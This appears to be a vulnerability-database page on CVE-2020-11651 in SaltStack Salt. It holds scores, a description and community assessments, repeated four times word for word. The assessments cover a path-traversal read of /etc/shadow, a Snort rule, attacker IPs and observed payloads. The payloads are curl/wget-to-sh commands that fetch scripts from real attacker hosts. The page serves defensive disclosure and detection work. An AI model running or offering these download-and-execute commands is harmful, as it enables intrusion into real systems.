9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.
Recent assessments:
kevthehermit at May 01, 2020 8:19pm UTC reported:
For Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.
If a salt-master has its ZeroMQ ports 4506
exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.
This requires multiple socket requests. one to read the key and then additional requests to create jobs.
This POC was tested on SaltStack 2019.2.0
As of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here – <https://github.com/kevthehermit/CVE-2020-11651>
The POC and others I am sure will appear shortly has the following functionality
Read the root key
Read and Write files on the Salt Master
Construct a payload to gain full RCE as root on any connected Minion
This took several hours and is “easy” with the available information and access to a test instance. Details on the discovery process can be found on our blog – <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/>
Patch to the latest versions and do not expose theses ports to the external network.
examine /var/cache/salt/master/jobs/
on the salt master for a listing of all jobs. the return.p
file in these dirs will contain a detailed description of the request and the response. This data is serialised.
Immersive Labs have released a basic python script to parse all these job files – <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>
# cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p
��return��fun�wheel.file_roots.read�jid�20200501195107225222�user�UNKNOWN�fun_args��../../../../etc/shadow��saltenv�base�_stamp�2020-05-01T19:51:07.229260�return��� /srv/salt/../../../../etc/shadow��root:!::0:::::
bin:!::0:::::
daemon:!::0:::::
adm:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
operator:!::0:::::
man:!::0:::::
postmaster:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
at:!::0:::::
squid:!::0:::::
xfs:!::0:::::
games:!::0:::::
postgres:!::0:::::
cyrus:!::0:::::
vpopmail:!::0:::::
ntp:!::0:::::
smmsp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
salt:!:18164:0:99999:7:::
Snort Rule:
alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:"Salt Stack root_key read attempt"; content:"_prep_auth_info"; sid:1000000; rev:1;)
On the wire it looks a bit like this so a stronger rule can be created
b'\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xaf_prep_auth_info'
The following IPS have been observed sending malicious payloads. other IPS have been seen scanning.
95.181.178.108
89.151.132.112
89.27.255.58
104.244.76.189
95.213.139.92
81.92.218.74
178.44.87.133
The following Payloads have been observed
(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh
import subprocess;subprocess.call(\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\",shell=True)
/bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='
(curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh
(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh
(curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh
/bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]
hrbrmstr at May 04, 2020 10:40am UTC reported:
For Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.
If a salt-master has its ZeroMQ ports 4506
exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.
This requires multiple socket requests. one to read the key and then additional requests to create jobs.
This POC was tested on SaltStack 2019.2.0
As of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here – <https://github.com/kevthehermit/CVE-2020-11651>
The POC and others I am sure will appear shortly has the following functionality
Read the root key
Read and Write files on the Salt Master
Construct a payload to gain full RCE as root on any connected Minion
This took several hours and is “easy” with the available information and access to a test instance. Details on the discovery process can be found on our blog – <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/>
Patch to the latest versions and do not expose theses ports to the external network.
examine /var/cache/salt/master/jobs/
on the salt master for a listing of all jobs. the return.p
file in these dirs will contain a detailed description of the request and the response. This data is serialised.
Immersive Labs have released a basic python script to parse all these job files – <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>
# cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p
��return��fun�wheel.file_roots.read�jid�20200501195107225222�user�UNKNOWN�fun_args��../../../../etc/shadow��saltenv�base�_stamp�2020-05-01T19:51:07.229260�return��� /srv/salt/../../../../etc/shadow��root:!::0:::::
bin:!::0:::::
daemon:!::0:::::
adm:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
operator:!::0:::::
man:!::0:::::
postmaster:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
at:!::0:::::
squid:!::0:::::
xfs:!::0:::::
games:!::0:::::
postgres:!::0:::::
cyrus:!::0:::::
vpopmail:!::0:::::
ntp:!::0:::::
smmsp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
salt:!:18164:0:99999:7:::
Snort Rule:
alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:"Salt Stack root_key read attempt"; content:"_prep_auth_info"; sid:1000000; rev:1;)
On the wire it looks a bit like this so a stronger rule can be created
b'\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xaf_prep_auth_info'
The following IPS have been observed sending malicious payloads. other IPS have been seen scanning.
95.181.178.108
89.151.132.112
89.27.255.58
104.244.76.189
95.213.139.92
81.92.218.74
178.44.87.133
The following Payloads have been observed
(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh
import subprocess;subprocess.call(\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\",shell=True)
/bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='
(curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh
(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh
(curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh
/bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]
z0r1nga at April 30, 2020 11:57pm UTC reported:
For Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.
If a salt-master has its ZeroMQ ports 4506
exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.
This requires multiple socket requests. one to read the key and then additional requests to create jobs.
This POC was tested on SaltStack 2019.2.0
As of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here – <https://github.com/kevthehermit/CVE-2020-11651>
The POC and others I am sure will appear shortly has the following functionality
Read the root key
Read and Write files on the Salt Master
Construct a payload to gain full RCE as root on any connected Minion
This took several hours and is “easy” with the available information and access to a test instance. Details on the discovery process can be found on our blog – <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/>
Patch to the latest versions and do not expose theses ports to the external network.
examine /var/cache/salt/master/jobs/
on the salt master for a listing of all jobs. the return.p
file in these dirs will contain a detailed description of the request and the response. This data is serialised.
Immersive Labs have released a basic python script to parse all these job files – <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>
# cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p
��return��fun�wheel.file_roots.read�jid�20200501195107225222�user�UNKNOWN�fun_args��../../../../etc/shadow��saltenv�base�_stamp�2020-05-01T19:51:07.229260�return��� /srv/salt/../../../../etc/shadow��root:!::0:::::
bin:!::0:::::
daemon:!::0:::::
adm:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
operator:!::0:::::
man:!::0:::::
postmaster:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
at:!::0:::::
squid:!::0:::::
xfs:!::0:::::
games:!::0:::::
postgres:!::0:::::
cyrus:!::0:::::
vpopmail:!::0:::::
ntp:!::0:::::
smmsp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
salt:!:18164:0:99999:7:::
Snort Rule:
alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:"Salt Stack root_key read attempt"; content:"_prep_auth_info"; sid:1000000; rev:1;)
On the wire it looks a bit like this so a stronger rule can be created
b'\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xaf_prep_auth_info'
The following IPS have been observed sending malicious payloads. other IPS have been seen scanning.
95.181.178.108
89.151.132.112
89.27.255.58
104.244.76.189
95.213.139.92
81.92.218.74
178.44.87.133
The following Payloads have been observed
(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh
import subprocess;subprocess.call(\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\",shell=True)
/bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='
(curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh
(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh
(curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh
/bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]
wvu-r7 at May 04, 2020 7:36am UTC reported:
For Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.
If a salt-master has its ZeroMQ ports 4506
exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.
This requires multiple socket requests. one to read the key and then additional requests to create jobs.
This POC was tested on SaltStack 2019.2.0
As of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here – <https://github.com/kevthehermit/CVE-2020-11651>
The POC and others I am sure will appear shortly has the following functionality
Read the root key
Read and Write files on the Salt Master
Construct a payload to gain full RCE as root on any connected Minion
This took several hours and is “easy” with the available information and access to a test instance. Details on the discovery process can be found on our blog – <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/>
Patch to the latest versions and do not expose theses ports to the external network.
examine /var/cache/salt/master/jobs/
on the salt master for a listing of all jobs. the return.p
file in these dirs will contain a detailed description of the request and the response. This data is serialised.
Immersive Labs have released a basic python script to parse all these job files – <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>
# cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p
��return��fun�wheel.file_roots.read�jid�20200501195107225222�user�UNKNOWN�fun_args��../../../../etc/shadow��saltenv�base�_stamp�2020-05-01T19:51:07.229260�return��� /srv/salt/../../../../etc/shadow��root:!::0:::::
bin:!::0:::::
daemon:!::0:::::
adm:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
operator:!::0:::::
man:!::0:::::
postmaster:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
at:!::0:::::
squid:!::0:::::
xfs:!::0:::::
games:!::0:::::
postgres:!::0:::::
cyrus:!::0:::::
vpopmail:!::0:::::
ntp:!::0:::::
smmsp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
salt:!:18164:0:99999:7:::
Snort Rule:
alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:"Salt Stack root_key read attempt"; content:"_prep_auth_info"; sid:1000000; rev:1;)
On the wire it looks a bit like this so a stronger rule can be created
b'\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xaf_prep_auth_info'
The following IPS have been observed sending malicious payloads. other IPS have been seen scanning.
95.181.178.108
89.151.132.112
89.27.255.58
104.244.76.189
95.213.139.92
81.92.218.74
178.44.87.133
The following Payloads have been observed
(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh
import subprocess;subprocess.call(\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\",shell=True)
/bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='
(curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh
(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh
(curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh
/bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]
Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 4
lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html
lists.opensuse.org/opensuse-security-announce/2020-07/msg00070.html
packetstormsecurity.com/files/157560/Saltstack-3000.1-Remote-Code-Execution.html
packetstormsecurity.com/files/157678/SaltStack-Salt-Master-Minion-Unauthenticated-Remote-Code-Execution.html
www.vmware.com/security/advisories/VMSA-2020-0009.html
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11651
docs.saltstack.com/en/latest/topics/releases/2019.2.4.html
github.com/saltstack/salt/blob/v3000.2_docs/doc/topics/releases/3000.2.rst
lists.debian.org/debian-lts-announce/2020/05/msg00027.html
tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG
usn.ubuntu.com/4459-1
www.debian.org/security/2020/dsa-4676
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%